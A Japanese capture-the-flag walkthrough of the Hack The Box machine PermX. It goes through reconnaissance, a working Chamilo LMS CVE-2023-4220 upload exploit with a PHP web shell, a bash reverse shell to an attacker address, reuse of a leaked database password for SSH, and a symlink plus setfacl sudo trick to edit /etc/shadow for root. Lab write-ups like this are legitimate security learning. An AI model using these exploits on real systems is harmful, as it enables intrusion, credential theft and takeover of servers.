こちらもSeason 5。 EASYマシンだとパスワード見つけたら取りあえずログイン試す、みたいなので入れること多い気がする。
HTB PermX
nmap
# hosts 追加 echo "10.129.135.205 permx.htb" | sudo tee -a /etc/hosts
$ nmap -sC -A permx.htb PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA) |_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-title: Did not follow redirect to http://permx.htb |_http-server-header: Apache/2.4.52 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
- SSH/HTTP のいつもの構成
http://permx.htb/
- http://permx.htb/
- eLEARNING Loadingめっちゃ回ってて草
- wow.jsらしい https://wowjs.uk/
- pagesの下にコンテンツある 404とかも
- SSIかなあ?
サブドメイン探索
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \ -H "Host: FUZZ.permx.htb" -u http://permx.htb/ -fc 302 www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 497ms] lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 286ms]
echo "10.129.135.205 www.permx.htb" | sudo tee -a /etc/hosts echo "10.129.135.205 lms.permx.htb" | sudo tee -a /etc/hosts
http://lms.permx.htb/
- http://lms.permx.htb/
- http://lms.permx.htb/main/auth/lostPassword.php
- パスワードリセット
- test =>
There is no account with this user and/or e-mail address - "' OR 1=1; --" => 同じ
- Bool based SQLiっぽい?と思ったけど、これ普通に製品CMSだSQLiじゃないな
Chamilo (CMS)
- そういえば管理画面よくみたらCMSっぽい
- バージョンは不明
- https://starlabs.sg/advisories/23/23-3368/
- (CVE-2023-3368) Chamilo LMS Unauthenticated Command Injection
- Exploit がありそう
- http://lms.permx.htb/main/webservices/additional_webservices.php ある
- https://starlabs.sg/advisories/23/23-3368/#proof-of-concept
- PoCコードがあるので使ってみる
cat > exploit.py python3 exploit.py -u http://lms.permx.htb/ -c 'id > /tmp/pwned' An error has occured, URL is not vulnerable: http://lms.permx.htb/
違うか
- https://starlabs.sg/advisories/23/23-3533/
- (CVE-2023-3533) Chamilo LMS Unauthenticated Remote Code Execution via Arbitrary File Write
- 他にもある
- PoCコードもあるので見てみる
python3 exploit2.py -u http://lms.permx.htb/ rce -p system id Overwriting session file at: ../../../../../../../../tmp/sess_sJY7EXvdQiMhPRqe9RGIwoF29l4geYiM Setting ch_sid=sJY7EXvdQiMhPRqe9RGIwoF29l4geYiM Invoking system() with arguments: id Found data: URL not vulnerable: http://lms.permx.htb/
これも違う
msfconsole msf6 > search CVE-2023-34960 msf6 > use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960 ... [-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. No valid response received from the target. "set ForceExploit true" to override check result.
これも違うなあ
indexesがtrue?
- indexが...全部見える
- http://lms.permx.htb/web/
- http://lms.permx.htb/app/
- phpファイルは実行されてしまうけど、ymlファイルとかは全部ダウンロード出来る
- http://lms.permx.htb/app/config/
- parameters.yml.dist
parameters:
database_driver: pdo_mysql
database_host: 127.0.0.1
database_port: ~
database_name: chamilo111
database_user: root
database_password: root
mailer_transport: smtp
mailer_host: 127.0.0.1
mailer_user: ~
mailer_password: ~
役に立ちそうにはないか なんかいろいろありそうだしfuzz
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://lms.permx.htb/FUZZ
.htaccess [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 251ms]
[Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 501ms]
.hta [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2000ms]
.htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 4703ms]
app [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 440ms]
bin [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 249ms]
certificates [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 250ms]
documentation [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 249ms]
favicon.ico [Status: 200, Size: 2462, Words: 3, Lines: 2, Duration: 251ms]
index.php [Status: 200, Size: 19356, Words: 4910, Lines: 353, Duration: 282ms]
LICENSE [Status: 200, Size: 35147, Words: 5836, Lines: 675, Duration: 253ms]
main [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 292ms]
plugin [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 249ms]
robots.txt [Status: 200, Size: 748, Words: 75, Lines: 34, Duration: 272ms]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 250ms]
src [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 305ms]
vendor [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 251ms]
web.config [Status: 200, Size: 5780, Words: 1119, Lines: 107, Duration: 250ms]
web [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 265ms]
あやしそうなの
- http://lms.permx.htb/certificates/
- ログインフォーム
- http://lms.permx.htb/documentation/changelog.html
- Chamilo 1.11.24 バージョンが確定
- つまり重要な脆弱性のあるバージョンじゃない
CVE-2023-4220/4224 BigUpload
こっちは学習者アカウントが必要 - https://www.cve.org/CVERecord?id=CVE-2023-4224 - https://starlabs.sg/advisories/23/23-4224/
こっちは不要 - https://www.cve.org/CVERecord?id=CVE-2023-4220 - https://github.com/charlesgargasson/CVE-2023-4220
$ cat exploit.sh
#!/bin/bash
HOST='http://lms.permx.htb'
CMD='id'
URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'
cat <<'EOF'>/tmp/rce.php
<?php
$a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a);
?>
EOF
curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD"
CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")
curl "$HOST/$URL_FILE?aoOoy=$CMD
└─$ sh exploit.sh The file has successfully been uploaded.uid=33(www-data) gid=33(www-data) groups=33(www-data)
できた!
└─$ head exploit.sh #!/bin/bash HOST='http://lms.permx.htb' CMD='bash -c "bash -i >& /dev/tcp/10.10.16.23/4444 0>&1"'
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami
<ilo/main/inc/lib/javascript/bigupload/files$ whoami
www-data
www-data@permx:/var/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data => mtz
www-data@permx:/var/www$ ls -la /home ls -la /home total 12 drwxr-xr-x 3 root root 4096 Jan 20 18:10 . drwxr-xr-x 18 root root 4096 Jul 1 13:05 .. drwxr-x--- 4 mtz mtz 4096 Jun 6 05:24 mtz
- /var/www/chamilo/app/config/configuration.php
$_configuration['db_host'] = 'localhost'; $_configuration['db_port'] = '3306'; $_configuration['main_database'] = 'chamilo'; $_configuration['db_user'] = 'chamilo'; $_configuration['db_password'] = '03F6lY3uXAP2bkW8';
DBパスワードありそうだけど、さて...
ssh mtz@permx.htb mtz@permx.htb's password: Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64) ... mtz@permx:~$ whoami mtz mtz@permx:~$ cat user.txt XXXX
はいれた
sudo
mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.sh
お約束のsudo抜け
mtz@permx:~$ cat /opt/acl.sh
#!/bin/bash
if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
- setfaclってなんじゃ
- https://atmarkit.itmedia.co.jp/ait/articles/1808/23/news026.html
- https://www.mtioutput.com/entry/chmod-setfacl-differ
- ACL操作するコマンドだった (しらんかった!)
- 拡張権限が付く (+がつくよ)
sudo /opt/acl.sh root rwx /home/mtz/vi
このような実行が可能だが、script.shは "/home/mtz/" を含むこと、".."を含まないことという制限がある。 更にsymlink対策としてファイルかどうかもチェックしている。
- なんとか/opt/acl.shを編集出来るようにしたい
- /home/mtz/ は必ず必要
- .. は使えない
- ではsymlinkで対策
- ln -s / /home/mtz/root
- setfacl /home/mtz/root/shadow
- rootのパスワードを書き込む
mtz@permx:~$ ln -s / root mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow mtz@permx:~$ ls -la /etc/shadow -rw-rwx---+ 1 root shadow 1119 Jul 9 00:06 /etc/shadow mtz@permx:~$ getfacl /etc/shadow getfacl: Removing leading '/' from absolute path names # file: etc/shadow # owner: root # group: shadow user::rw- user:mtz:rwx
- なぜか3分ぐらいでパーミッション切れる...
- どうもリセットされているらしいので素早くやる
#パスワードは適当に mkpasswd -m sha-512 passwd $6$sYeguGCxuj27fXWi$11KdBNmu2T6gy1.E0STz1x26/QQdN4t05S2eAAsj57b0PrWExNtshi3L98aVW3Zkl2nXbKEewyOJcqZFoLRPL1
ln -s / /home/mtz/root sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow vi /etc/shadow
root@permx:/home/mtz# whoami root root@permx:/home/mtz# cat /root/root.txt XXXX
GJ!
